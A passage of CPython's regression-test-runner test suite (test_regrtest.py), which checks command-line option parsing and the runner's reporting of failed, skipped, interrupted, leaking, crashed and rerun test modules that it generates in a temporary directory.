except ImportError:
import os
os.kill(os.getpid(), SIGINT)
""")
class ParseArgsTestCase(unittest.TestCase):
"""
Test regrtest's argument parsing, function _parse_args().
"""
def checkError(self, args, msg):
with support.captured_stderr() as err, self.assertRaises(SystemExit):
libregrtest._parse_args(args)
self.assertIn(msg, err.getvalue())
def test_help(self):
for opt in '-h', '--help':
with self.subTest(opt=opt):
with support.captured_stdout() as out, \
self.assertRaises(SystemExit):
libregrtest._parse_args([opt])
self.assertIn('Run Python regression tests.', out.getvalue())
def test_timeout(self):
ns = libregrtest._parse_args(['--timeout', '4.2'])
self.assertEqual(ns.timeout, 4.2)
self.checkError(['--timeout'], 'expected one argument')
self.checkError(['--timeout', 'foo'], 'invalid float value')
def test_wait(self):
ns = libregrtest._parse_args(['--wait'])
self.assertTrue(ns.wait)
def test_worker_args(self):
ns = libregrtest._parse_args(['--worker-args', '[[], {}]'])
self.assertEqual(ns.worker_args, '[[], {}]')
self.checkError(['--worker-args'], 'expected one argument')
def test_start(self):
for opt in '-S', '--start':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.start, 'foo')
self.checkError([opt], 'expected one argument')
def test_verbose(self):
ns = libregrtest._parse_args(['-v'])
self.assertEqual(ns.verbose, 1)
ns = libregrtest._parse_args(['-vvv'])
self.assertEqual(ns.verbose, 3)
ns = libregrtest._parse_args(['--verbose'])
self.assertEqual(ns.verbose, 1)
ns = libregrtest._parse_args(['--verbose'] * 3)
self.assertEqual(ns.verbose, 3)
ns = libregrtest._parse_args([])
self.assertEqual(ns.verbose, 0)
def test_verbose2(self):
for opt in '-w', '--verbose2':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.verbose2)
def test_verbose3(self):
for opt in '-W', '--verbose3':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.verbose3)
def test_quiet(self):
for opt in '-q', '--quiet':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
def test_slowest(self):
for opt in '-o', '--slowest':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.print_slow)
def test_header(self):
ns = libregrtest._parse_args(['--header'])
self.assertTrue(ns.header)
ns = libregrtest._parse_args(['--verbose'])
self.assertTrue(ns.header)
def test_randomize(self):
for opt in '-r', '--randomize':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.randomize)
def test_randseed(self):
ns = libregrtest._parse_args(['--randseed', '12345'])
self.assertEqual(ns.random_seed, 12345)
self.assertTrue(ns.randomize)
self.checkError(['--randseed'], 'expected one argument')
self.checkError(['--randseed', 'foo'], 'invalid int value')
def test_fromfile(self):
for opt in '-f', '--fromfile':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.fromfile, 'foo')
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo', '-s'], "don't go together")
def test_exclude(self):
for opt in '-x', '--exclude':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.exclude)
def test_single(self):
for opt in '-s', '--single':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.single)
self.checkError([opt, '-f', 'foo'], "don't go together")
def test_ignore(self):
for opt in '-i', '--ignore':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'pattern'])
self.assertEqual(ns.ignore_tests, ['pattern'])
self.checkError([opt], 'expected one argument')
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as fp:
print('matchfile1', file=fp)
print('matchfile2', file=fp)
filename = os.path.abspath(os_helper.TESTFN)
ns = libregrtest._parse_args(['-m', 'match',
'--ignorefile', filename])
self.assertEqual(ns.ignore_tests,
['matchfile1', 'matchfile2'])
def test_match(self):
for opt in '-m', '--match':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'pattern'])
self.assertEqual(ns.match_tests, ['pattern'])
self.checkError([opt], 'expected one argument')
ns = libregrtest._parse_args(['-m', 'pattern1',
'-m', 'pattern2'])
self.assertEqual(ns.match_tests, ['pattern1', 'pattern2'])
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "w") as fp:
print('matchfile1', file=fp)
print('matchfile2', file=fp)
filename = os.path.abspath(os_helper.TESTFN)
ns = libregrtest._parse_args(['-m', 'match',
'--matchfile', filename])
self.assertEqual(ns.match_tests,
['match', 'matchfile1', 'matchfile2'])
def test_failfast(self):
for opt in '-G', '--failfast':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '-v'])
self.assertTrue(ns.failfast)
ns = libregrtest._parse_args([opt, '-W'])
self.assertTrue(ns.failfast)
self.checkError([opt], '-G/--failfast needs either -v or -W')
def test_use(self):
for opt in '-u', '--use':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'gui,network'])
self.assertEqual(ns.use_resources, ['gui', 'network'])
ns = libregrtest._parse_args([opt, 'gui,none,network'])
self.assertEqual(ns.use_resources, ['network'])
expected = list(libregrtest.ALL_RESOURCES)
expected.remove('gui')
ns = libregrtest._parse_args([opt, 'all,-gui'])
self.assertEqual(ns.use_resources, expected)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid resource')
# all + a resource not part of "all"
ns = libregrtest._parse_args([opt, 'all,tzdata'])
self.assertEqual(ns.use_resources,
list(libregrtest.ALL_RESOURCES) + ['tzdata'])
# test another resource which is not part of "all"
ns = libregrtest._parse_args([opt, 'extralargefile'])
self.assertEqual(ns.use_resources, ['extralargefile'])
def test_memlimit(self):
for opt in '-M', '--memlimit':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '4G'])
self.assertEqual(ns.memlimit, '4G')
self.checkError([opt], 'expected one argument')
def test_testdir(self):
ns = libregrtest._parse_args(['--testdir', 'foo'])
self.assertEqual(ns.testdir, os.path.join(os_helper.SAVEDCWD, 'foo'))
self.checkError(['--testdir'], 'expected one argument')
def test_runleaks(self):
for opt in '-L', '--runleaks':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.runleaks)
def test_huntrleaks(self):
for opt in '-R', '--huntrleaks':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, ':'])
self.assertEqual(ns.huntrleaks, (5, 4, 'reflog.txt'))
ns = libregrtest._parse_args([opt, '6:'])
self.assertEqual(ns.huntrleaks, (6, 4, 'reflog.txt'))
ns = libregrtest._parse_args([opt, ':3'])
self.assertEqual(ns.huntrleaks, (5, 3, 'reflog.txt'))
ns = libregrtest._parse_args([opt, '6:3:leaks.log'])
self.assertEqual(ns.huntrleaks, (6, 3, 'leaks.log'))
self.checkError([opt], 'expected one argument')
self.checkError([opt, '6'],
'needs 2 or 3 colon-separated arguments')
self.checkError([opt, 'foo:'], 'invalid huntrleaks value')
self.checkError([opt, '6:foo'], 'invalid huntrleaks value')
def test_multiprocess(self):
for opt in '-j', '--multiprocess':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '2'])
self.assertEqual(ns.use_mp, 2)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid int value')
self.checkError([opt, '2', '-T'], "don't go together")
self.checkError([opt, '0', '-T'], "don't go together")
def test_coverage(self):
for opt in '-T', '--coverage':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.trace)
def test_coverdir(self):
for opt in '-D', '--coverdir':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, 'foo'])
self.assertEqual(ns.coverdir,
os.path.join(os_helper.SAVEDCWD, 'foo'))
self.checkError([opt], 'expected one argument')
def test_nocoverdir(self):
for opt in '-N', '--nocoverdir':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertIsNone(ns.coverdir)
def test_threshold(self):
for opt in '-t', '--threshold':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt, '1000'])
self.assertEqual(ns.threshold, 1000)
self.checkError([opt], 'expected one argument')
self.checkError([opt, 'foo'], 'invalid int value')
def test_nowindows(self):
for opt in '-n', '--nowindows':
with self.subTest(opt=opt):
with contextlib.redirect_stderr(io.StringIO()) as stderr:
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.nowindows)
err = stderr.getvalue()
self.assertIn('the --nowindows (-n) option is deprecated', err)
def test_forever(self):
for opt in '-F', '--forever':
with self.subTest(opt=opt):
ns = libregrtest._parse_args([opt])
self.assertTrue(ns.forever)
def test_unrecognized_argument(self):
self.checkError(['--xxx'], 'usage:')
def test_long_option__partial(self):
ns = libregrtest._parse_args(['--qui'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
def test_two_options(self):
ns = libregrtest._parse_args(['--quiet', '--exclude'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
self.assertTrue(ns.exclude)
def test_option_with_empty_string_value(self):
ns = libregrtest._parse_args(['--start', ''])
self.assertEqual(ns.start, '')
def test_arg(self):
ns = libregrtest._parse_args(['foo'])
self.assertEqual(ns.args, ['foo'])
def test_option_and_arg(self):
ns = libregrtest._parse_args(['--quiet', 'foo'])
self.assertTrue(ns.quiet)
self.assertEqual(ns.verbose, 0)
self.assertEqual(ns.args, ['foo'])
def test_arg_option_arg(self):
ns = libregrtest._parse_args(['test_unaryop', '-v', 'test_binop'])
self.assertEqual(ns.verbose, 1)
self.assertEqual(ns.args, ['test_unaryop', 'test_binop'])
def test_unknown_option(self):
self.checkError(['--unknown-option'],
'unrecognized arguments: --unknown-option')
class BaseTestCase(unittest.TestCase):
TEST_UNIQUE_ID = 1
TESTNAME_PREFIX = 'test_regrtest_'
TESTNAME_REGEX = r'test_[a-zA-Z0-9_]+'
def setUp(self):
self.testdir = os.path.realpath(os.path.dirname(__file__))
self.tmptestdir = tempfile.mkdtemp()
self.addCleanup(os_helper.rmtree, self.tmptestdir)
def create_test(self, name=None, code=None):
if not name:
name = 'noop%s' % BaseTestCase.TEST_UNIQUE_ID
BaseTestCase.TEST_UNIQUE_ID += 1
if code is None:
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_empty_test(self):
pass
""")
# test_regrtest cannot be run twice in parallel because
# of setUp() and create_test()
name = self.TESTNAME_PREFIX + name
path = os.path.join(self.tmptestdir, name + '.py')
self.addCleanup(os_helper.unlink, path)
# Use 'x' mode to ensure that we do not override existing tests
try:
with open(path, 'x', encoding='utf-8') as fp:
fp.write(code)
except PermissionError as exc:
if not sysconfig.is_python_build():
self.skipTest("cannot write %s: %s" % (path, exc))
raise
return name
def regex_search(self, regex, output):
match = re.search(regex, output, re.MULTILINE)
if not match:
self.fail("%r not found in %r" % (regex, output))
return match
def check_line(self, output, regex):
regex = re.compile(r'^' + regex, re.MULTILINE)
self.assertRegex(output, regex)
def parse_executed_tests(self, output):
regex = (r'^%s\[ *[0-9]+(?:/ *[0-9]+)*\] (%s)'
% (LOG_PREFIX, self.TESTNAME_REGEX))
parser = re.finditer(regex, output, re.MULTILINE)
return list(match.group(1) for match in parser)
def check_executed_tests(self, output, tests, skipped=(), failed=(),
env_changed=(), omitted=(),
rerun={}, no_test_ran=(),
randomize=False, interrupted=False,
fail_env_changed=False):
if isinstance(tests, str):
tests = [tests]
if isinstance(skipped, str):
skipped = [skipped]
if isinstance(failed, str):
failed = [failed]
if isinstance(env_changed, str):
env_changed = [env_changed]
if isinstance(omitted, str):
omitted = [omitted]
if isinstance(no_test_ran, str):
no_test_ran = [no_test_ran]
executed = self.parse_executed_tests(output)
if randomize:
self.assertEqual(set(executed), set(tests), output)
else:
self.assertEqual(executed, tests, output)
def plural(count):
return 's' if count != 1 else ''
def list_regex(line_format, tests):
count = len(tests)
names = ' '.join(sorted(tests))
regex = line_format % (count, plural(count))
regex = r'%s:\n %s$' % (regex, names)
return regex
if skipped:
regex = list_regex('%s test%s skipped', skipped)
self.check_line(output, regex)
if failed:
regex = list_regex('%s test%s failed', failed)
self.check_line(output, regex)
if env_changed:
regex = list_regex('%s test%s altered the execution environment',
env_changed)
self.check_line(output, regex)
if omitted:
regex = list_regex('%s test%s omitted', omitted)
self.check_line(output, regex)
if rerun:
regex = list_regex('%s re-run test%s', rerun.keys())
self.check_line(output, regex)
regex = LOG_PREFIX + r"Re-running failed tests in verbose mode"
self.check_line(output, regex)
for name, match in rerun.items():
regex = LOG_PREFIX + f"Re-running {name} in verbose mode \\(matching: {match}\\)"
self.check_line(output, regex)
if no_test_ran:
regex = list_regex('%s test%s run no tests', no_test_ran)
self.check_line(output, regex)
good = (len(tests) - len(skipped) - len(failed)
- len(omitted) - len(env_changed) - len(no_test_ran))
if good:
regex = r'%s test%s OK\.$' % (good, plural(good))
if not skipped and not failed and good > 1:
regex = 'All %s' % regex
self.check_line(output, regex)
if interrupted:
self.check_line(output, 'Test suite interrupted by signal SIGINT.')
result = []
if failed:
result.append('FAILURE')
elif fail_env_changed and env_changed:
result.append('ENV CHANGED')
if interrupted:
result.append('INTERRUPTED')
if not any((good, result, failed, interrupted, skipped,
env_changed, fail_env_changed)):
result.append("NO TEST RUN")
elif not result:
result.append('SUCCESS')
result = ', '.join(result)
if rerun:
self.check_line(output, 'Tests result: FAILURE')
result = 'FAILURE then %s' % result
self.check_line(output, 'Tests result: %s' % result)
def parse_random_seed(self, output):
match = self.regex_search(r'Using random seed ([0-9]+)', output)
randseed = int(match.group(1))
self.assertTrue(0 <= randseed <= 10000000, randseed)
return randseed
def run_command(self, args, input=None, exitcode=0, **kw):
if not input:
input = ''
if 'stderr' not in kw:
kw['stderr'] = subprocess.STDOUT
proc = subprocess.run(args,
universal_newlines=True,
input=input,
stdout=subprocess.PIPE,
**kw)
if proc.returncode != exitcode:
msg = ("Command %s failed with exit code %s\n"
"\n"
"stdout:\n"
"---\n"
"%s\n"
"---\n"
% (str(args), proc.returncode, proc.stdout))
if proc.stderr:
msg += ("\n"
"stderr:\n"
"---\n"
"%s"
"---\n"
% proc.stderr)
self.fail(msg)
return proc
def run_python(self, args, **kw):
args = [sys.executable, '-X', 'faulthandler', '-I', *args]
proc = self.run_command(args, **kw)
return proc.stdout
class CheckActualTests(BaseTestCase):
def test_finds_expected_number_of_tests(self):
"""
Check that regrtest appears to find the expected set of tests.
"""
args = ['-Wd', '-E', '-bb', '-m', 'test.regrtest', '--list-tests']
output = self.run_python(args)
rough_number_of_tests_found = len(output.splitlines())
actual_testsuite_glob = os.path.join(glob.escape(os.path.dirname(__file__)),
'test*.py')
rough_counted_test_py_files = len(glob.glob(actual_testsuite_glob))
# We're not trying to duplicate test finding logic in here,
# just give a rough estimate of how many there should be and
# be near that. This is a regression test to prevent mishaps
# such as https://bugs.python.org/issue37667 in the future.
# If you need to change the values in here during some
# mythical future test suite reorganization, don't go
# overboard with logic and keep that goal in mind.
self.assertGreater(rough_number_of_tests_found,
rough_counted_test_py_files*9//10,
msg='Unexpectedly low number of tests found in:\n'
f'{", ".join(output.splitlines())}')
class ProgramsTestCase(BaseTestCase):
"""
Test various ways to run the Python test suite. Use options close
to options used on the buildbot.
"""
NTEST = 4
def setUp(self):
super().setUp()
# Create NTEST tests doing nothing
self.tests = [self.create_test() for index in range(self.NTEST)]
self.python_args = ['-Wd', '-E', '-bb']
self.regrtest_args = ['-uall', '-rwW',
'--testdir=%s' % self.tmptestdir]
self.regrtest_args.extend(('--timeout', '3600', '-j4'))
if sys.platform == 'win32':
self.regrtest_args.append('-n')
def check_output(self, output):
self.parse_random_seed(output)
self.check_executed_tests(output, self.tests, randomize=True)
def run_tests(self, args):
output = self.run_python(args)
self.check_output(output)
def test_script_regrtest(self):
# Lib/test/regrtest.py
script = os.path.join(self.testdir, 'regrtest.py')
args = [*self.python_args, script, *self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_test(self):
# -m test
args = [*self.python_args, '-m', 'test',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_regrtest(self):
# -m test.regrtest
args = [*self.python_args, '-m', 'test.regrtest',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_autotest(self):
# -m test.autotest
args = [*self.python_args, '-m', 'test.autotest',
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_module_from_test_autotest(self):
# from test import autotest
code = 'from test import autotest'
args = [*self.python_args, '-c', code,
*self.regrtest_args, *self.tests]
self.run_tests(args)
def test_script_autotest(self):
# Lib/test/autotest.py
script = os.path.join(self.testdir, 'autotest.py')
args = [*self.python_args, script, *self.regrtest_args, *self.tests]
self.run_tests(args)
@unittest.skipUnless(sysconfig.is_python_build(),
'run_tests.py script is not installed')
def test_tools_script_run_tests(self):
# Tools/scripts/run_tests.py
script = os.path.join(ROOT_DIR, 'Tools', 'scripts', 'run_tests.py')
args = [script, *self.regrtest_args, *self.tests]
self.run_tests(args)
def run_batch(self, *args):
proc = self.run_command(args)
self.check_output(proc.stdout)
@unittest.skipUnless(sysconfig.is_python_build(),
'test.bat script is not installed')
@unittest.skipUnless(sys.platform == 'win32', 'Windows only')
def test_tools_buildbot_test(self):
# Tools\buildbot\test.bat
script = os.path.join(ROOT_DIR, 'Tools', 'buildbot', 'test.bat')
test_args = ['--testdir=%s' % self.tmptestdir]
if platform.machine() == 'ARM64':
test_args.append('-arm64') # ARM 64-bit build
elif platform.machine() == 'ARM':
test_args.append('-arm32') # 32-bit ARM build
elif platform.architecture()[0] == '64bit':
test_args.append('-x64') # 64-bit build
if not support.Py_DEBUG:
test_args.append('+d') # Release build, use python.exe
self.run_batch(script, *test_args, *self.tests)
@unittest.skipUnless(sys.platform == 'win32', 'Windows only')
def test_pcbuild_rt(self):
# PCbuild\rt.bat
script = os.path.join(ROOT_DIR, r'PCbuild\rt.bat')
if not os.path.isfile(script):
self.skipTest(f'File "{script}" does not exist')
rt_args = ["-q"] # Quick, don't run tests twice
if platform.machine() == 'ARM64':
rt_args.append('-arm64') # ARM 64-bit build
elif platform.machine() == 'ARM':
rt_args.append('-arm32') # 32-bit ARM build
elif platform.architecture()[0] == '64bit':
rt_args.append('-x64') # 64-bit build
if support.Py_DEBUG:
rt_args.append('-d') # Debug build, use python_d.exe
self.run_batch(script, *rt_args, *self.regrtest_args, *self.tests)
class ArgsTestCase(BaseTestCase):
"""
Test arguments of the Python test suite.
"""
def run_tests(self, *testargs, **kw):
cmdargs = ['-m', 'test', '--testdir=%s' % self.tmptestdir, *testargs]
return self.run_python(cmdargs, **kw)
def test_failing_test(self):
# test a failing test
code = textwrap.dedent("""
import unittest
class FailingTest(unittest.TestCase):
def test_failing(self):
self.fail("bug")
""")
test_ok = self.create_test('ok')
test_failing = self.create_test('failing', code=code)
tests = [test_ok, test_failing]
output = self.run_tests(*tests, exitcode=2)
self.check_executed_tests(output, tests, failed=test_failing)
def test_resources(self):
# test -u command line option
tests = {}
for resource in ('audio', 'network'):
code = textwrap.dedent("""
from test import support; support.requires(%r)
import unittest
class PassingTest(unittest.TestCase):
def test_pass(self):
pass
""" % resource)
tests[resource] = self.create_test(resource, code)
test_names = sorted(tests.values())
# -u all: 2 resources enabled
output = self.run_tests('-u', 'all', *test_names)
self.check_executed_tests(output, test_names)
# -u audio: 1 resource enabled
output = self.run_tests('-uaudio', *test_names)
self.check_executed_tests(output, test_names,
skipped=tests['network'])
# no option: 0 resources enabled
output = self.run_tests(*test_names)
self.check_executed_tests(output, test_names,
skipped=test_names)
def test_random(self):
# test -r and --randseed command line option
code = textwrap.dedent("""
import random
print("TESTRANDOM: %s" % random.randint(1, 1000))
""")
test = self.create_test('random', code)
# first run to get the output with the random seed
output = self.run_tests('-r', test)
randseed = self.parse_random_seed(output)
match = self.regex_search(r'TESTRANDOM: ([0-9]+)', output)
test_random = int(match.group(1))
# try to reproduce with the random seed
output = self.run_tests('-r', '--randseed=%s' % randseed, test)
randseed2 = self.parse_random_seed(output)
self.assertEqual(randseed2, randseed)
match = self.regex_search(r'TESTRANDOM: ([0-9]+)', output)
test_random2 = int(match.group(1))
self.assertEqual(test_random2, test_random)
def test_fromfile(self):
# test --fromfile
tests = [self.create_test() for index in range(5)]
# Write the list of files using a format similar to regrtest output:
# [1/2] test_1
# [2/2] test_2
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
# test format '0:00:00 [2/7] test_opcodes -- test_grammar took 0 sec'
with open(filename, "w") as fp:
previous = None
for index, name in enumerate(tests, 1):
line = ("00:00:%02i [%s/%s] %s"
% (index, index, len(tests), name))
if previous:
line += " -- %s took 0 sec" % previous
print(line, file=fp)
previous = name
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format '[2/7] test_opcodes'
with open(filename, "w") as fp:
for index, name in enumerate(tests, 1):
print("[%s/%s] %s" % (index, len(tests), name), file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format 'test_opcodes'
with open(filename, "w") as fp:
for name in tests:
print(name, file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
# test format 'Lib/test/test_opcodes.py'
with open(filename, "w") as fp:
for name in tests:
print('Lib/test/%s.py' % name, file=fp)
output = self.run_tests('--fromfile', filename)
self.check_executed_tests(output, tests)
def test_interrupted(self):
code = TEST_INTERRUPTED
test = self.create_test('sigint', code=code)
output = self.run_tests(test, exitcode=130)
self.check_executed_tests(output, test, omitted=test,
interrupted=True)
def test_slowest(self):
# test --slowest
tests = [self.create_test() for index in range(3)]
output = self.run_tests("--slowest", *tests)
self.check_executed_tests(output, tests)
regex = ('10 slowest tests:\n'
'(?:- %s: .*\n){%s}'
% (self.TESTNAME_REGEX, len(tests)))
self.check_line(output, regex)
def test_slowest_interrupted(self):
# Issue #25373: test --slowest with an interrupted test
code = TEST_INTERRUPTED
test = self.create_test("sigint", code=code)
for multiprocessing in (False, True):
with self.subTest(multiprocessing=multiprocessing):
if multiprocessing:
args = ("--slowest", "-j2", test)
else:
args = ("--slowest", test)
output = self.run_tests(*args, exitcode=130)
self.check_executed_tests(output, test,
omitted=test, interrupted=True)
regex = ('10 slowest tests:\n')
self.check_line(output, regex)
def test_coverage(self):
# test --coverage
test = self.create_test('coverage')
output = self.run_tests("--coverage", test)
self.check_executed_tests(output, [test])
regex = (r'lines +cov% +module +\(path\)\n'
r'(?: *[0-9]+ *[0-9]{1,2}% *[^ ]+ +\([^)]+\)+)+')
self.check_line(output, regex)
def test_wait(self):
# test --wait
test = self.create_test('wait')
output = self.run_tests("--wait", test, input='key')
self.check_line(output, 'Press any key to continue')
def test_forever(self):
# test --forever
code = textwrap.dedent("""
import builtins
import unittest
class ForeverTester(unittest.TestCase):
def test_run(self):
# Store the state in the builtins module, because the test
# module is reload at each run
if 'RUN' in builtins.__dict__:
builtins.__dict__['RUN'] += 1
if builtins.__dict__['RUN'] >= 3:
self.fail("fail at the 3rd runs")
else:
builtins.__dict__['RUN'] = 1
""")
test = self.create_test('forever', code=code)
output = self.run_tests('--forever', test, exitcode=2)
self.check_executed_tests(output, [test]*3, failed=test)
def check_leak(self, code, what):
test = self.create_test('huntrleaks', code=code)
filename = 'reflog.txt'
self.addCleanup(os_helper.unlink, filename)
output = self.run_tests('--huntrleaks', '3:3:', test,
exitcode=2,
stderr=subprocess.STDOUT)
self.check_executed_tests(output, [test], failed=test)
line = 'beginning 6 repetitions\n123456\n......\n'
self.check_line(output, re.escape(line))
line2 = '%s leaked [1, 1, 1] %s, sum=3\n' % (test, what)
self.assertIn(line2, output)
with open(filename) as fp:
reflog = fp.read()
self.assertIn(line2, reflog)
@unittest.skipUnless(support.Py_DEBUG, 'need a debug build')
def test_huntrleaks(self):
# test --huntrleaks
code = textwrap.dedent("""
import unittest
GLOBAL_LIST = []
class RefLeakTest(unittest.TestCase):
def test_leak(self):
GLOBAL_LIST.append(object())
""")
self.check_leak(code, 'references')
@unittest.skipUnless(support.Py_DEBUG, 'need a debug build')
def test_huntrleaks_fd_leak(self):
# test --huntrleaks for file descriptor leak
code = textwrap.dedent("""
import os
import unittest
class FDLeakTest(unittest.TestCase):
def test_leak(self):
fd = os.open(__file__, os.O_RDONLY)
# bug: never close the file descriptor
""")
self.check_leak(code, 'file descriptors')
def test_list_tests(self):
# test --list-tests
tests = [self.create_test() for i in range(5)]
output = self.run_tests('--list-tests', *tests)
self.assertEqual(output.rstrip().splitlines(),
tests)
def test_list_cases(self):
# test --list-cases
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
""")
testname = self.create_test(code=code)
# Test --list-cases
all_methods = ['%s.Tests.test_method1' % testname,
'%s.Tests.test_method2' % testname]
output = self.run_tests('--list-cases', testname)
self.assertEqual(output.splitlines(), all_methods)
# Test --list-cases with --match
all_methods = ['%s.Tests.test_method1' % testname]
output = self.run_tests('--list-cases',
'-m', 'test_method1',
testname)
self.assertEqual(output.splitlines(), all_methods)
@support.cpython_only
def test_crashed(self):
# Any code which causes a crash
code = 'import faulthandler; faulthandler._sigsegv()'
crash_test = self.create_test(name="crash", code=code)
tests = [crash_test]
output = self.run_tests("-j2", *tests, exitcode=2)
self.check_executed_tests(output, tests, failed=crash_test,
randomize=True)
def parse_methods(self, output):
regex = re.compile("^(test[^ ]+).*ok$", flags=re.MULTILINE)
return [match.group(1) for match in regex.finditer(output)]
def test_ignorefile(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
def test_method3(self):
pass
def test_method4(self):
pass
""")
all_methods = ['test_method1', 'test_method2',
'test_method3', 'test_method4']
testname = self.create_test(code=code)
# only run a subset
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
subset = [
# only ignore the method name
'test_method1',
# ignore the full identifier
'%s.Tests.test_method3' % testname]
with open(filename, "w") as fp:
for name in subset:
print(name, file=fp)
output = self.run_tests("-v", "--ignorefile", filename, testname)
methods = self.parse_methods(output)
subset = ['test_method2', 'test_method4']
self.assertEqual(methods, subset)
def test_matchfile(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_method1(self):
pass
def test_method2(self):
pass
def test_method3(self):
pass
def test_method4(self):
pass
""")
all_methods = ['test_method1', 'test_method2',
'test_method3', 'test_method4']
testname = self.create_test(code=code)
# by default, all methods should be run
output = self.run_tests("-v", testname)
methods = self.parse_methods(output)
self.assertEqual(methods, all_methods)
# only run a subset
filename = os_helper.TESTFN
self.addCleanup(os_helper.unlink, filename)
subset = [
# only match the method name
'test_method1',
# match the full identifier
'%s.Tests.test_method3' % testname]
with open(filename, "w") as fp:
for name in subset:
print(name, file=fp)
output = self.run_tests("-v", "--matchfile", filename, testname)
methods = self.parse_methods(output)
subset = ['test_method1', 'test_method3']
self.assertEqual(methods, subset)
def test_env_changed(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_env_changed(self):
open("env_changed", "w").close()
""")
testname = self.create_test(code=code)
# don't fail by default
output = self.run_tests(testname)
self.check_executed_tests(output, [testname], env_changed=testname)
# fail with --fail-env-changed
output = self.run_tests("--fail-env-changed", testname, exitcode=3)
self.check_executed_tests(output, [testname], env_changed=testname,
fail_env_changed=True)
def test_rerun_fail(self):
# FAILURE then FAILURE
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_succeed(self):
return
def test_fail_always(self):
# test that always fails
self.fail("bug")
""")
testname = self.create_test(code=code)
output = self.run_tests("-w", testname, exitcode=2)
self.check_executed_tests(output, [testname],
failed=testname, rerun={testname: "test_fail_always"})
def test_rerun_success(self):
# FAILURE then SUCCESS
code = textwrap.dedent("""
import builtins
import unittest
class Tests(unittest.TestCase):
def test_succeed(self):
return
def test_fail_once(self):
if not hasattr(builtins, '_test_failed'):
builtins._test_failed = True
self.fail("bug")
""")
testname = self.create_test(code=code)
output = self.run_tests("-w", testname, exitcode=0)
self.check_executed_tests(output, [testname],
rerun={testname: "test_fail_once"})
def test_no_tests_ran(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
output = self.run_tests(testname, "-m", "nosuchtest", exitcode=0)
self.check_executed_tests(output, [testname], no_test_ran=testname)
def test_no_tests_ran_skip(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_skipped(self):
self.skipTest("because")
""")
testname = self.create_test(code=code)
output = self.run_tests(testname, exitcode=0)
self.check_executed_tests(output, [testname])
def test_no_tests_ran_multiple_tests_nonexistent(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
testname2 = self.create_test(code=code)
output = self.run_tests(testname, testname2, "-m", "nosuchtest", exitcode=0)
self.check_executed_tests(output, [testname, testname2],
no_test_ran=[testname, testname2])
def test_no_test_ran_some_test_exist_some_not(self):
code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_bug(self):
pass
""")
testname = self.create_test(code=code)
other_code = textwrap.dedent("""
import unittest
class Tests(unittest.TestCase):
def test_other_bug(self):
pass
""")
testname2 = self.create_test(code=other_code)
output = self.run_tests(testname, testname2, "-m", "nosuchtest",
"-m", "test_other_bug", exitcode=0)
self.check_executed_tests(output, [testname, testname2],
no_test_ran=[testname])
@support.cpython_only
def test_uncollectable(self):
code = textwrap.dedent(r"""
import _testcapi
import gc
import unittest
@_testcapi.with_tp_del
class Garbage:
def __tp_del__(self):
pass
class Tests(unittest.TestCase):
def test_garbage(self):
# create an uncollectable object
obj = Garbage()
obj.ref_cycle = obj
obj = None
""")
testname = self.create_test(code=code)
output = self.run_tests("--fail-env-changed", testname, exitcode=3)
